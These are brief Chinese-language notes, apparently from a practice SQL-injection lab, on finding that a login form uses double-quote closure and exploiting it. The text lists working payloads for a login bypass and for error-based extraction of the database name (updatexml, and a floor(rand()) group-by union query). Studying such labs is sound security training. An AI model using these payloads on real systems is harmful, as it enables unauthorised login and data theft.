尝试单引号, 登录失败, 但是没有报错信息, 因此不是单引号闭合
再次尝试双引号, 发现存在报错信息, 因此猜测是双引号闭合
尝试
" or 1=1#
登录成功payload
"and updatexml(1,concat('*',(select database()),'*'),1)#
剩下的同前面
看到一个老哥用的payload是这样的, 跟之前的GET是类似的
union select count(*),concat((select database()),floor(rand()*2))a from information_schema.tables group by a#
union select的payload就是要注意有几个占位符, 列数要一致, 其他都是差不多的原理